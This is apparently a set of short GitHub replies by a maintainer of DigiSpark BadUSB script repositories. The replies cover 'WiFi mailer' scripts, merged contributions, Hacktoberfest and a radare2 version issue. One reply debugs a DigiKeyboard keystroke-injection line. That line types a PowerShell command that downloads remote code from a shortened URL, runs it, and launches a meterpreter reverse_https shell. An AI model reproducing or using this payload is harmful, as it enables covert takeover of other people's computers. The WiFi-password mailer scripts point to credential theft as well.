Hi, glad you are interested in using one of the WiFi mailer scripts. Could you please provide some more relevant information like which script you are using, if the computer...
Hi, I'm happy you are taking interest in using one of the scripts. Could you please specify which particular script you are using and the Windows Build number of the...
@poudelrenish What process did you follow to load the script onto the DigiSpark?
@nassimosaz Will check it ASAP, probably Monday. Thanks for contributing! :D
@Michyus Just merged it. Thank you for your contribution! 👍
New Hacktoberfest season! All newcomers welcome! 😄 👍
Sorry for the late reply, I missed the notification. Looks like the double quotes aren't escaped. This should do the trick: `DigiKeyboard.println("powershell \"IEX (New-Object Net.WebClient).DownloadString('http://bit.ly/14bZZ0c'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost -Lport...
@mirco-salvador2012 This seems to happen due to an issue with the latest version of radare2. Uninstalling the latest version and installing v3.1.3 might help. See PR #8 for more details.
Added some items in PR #58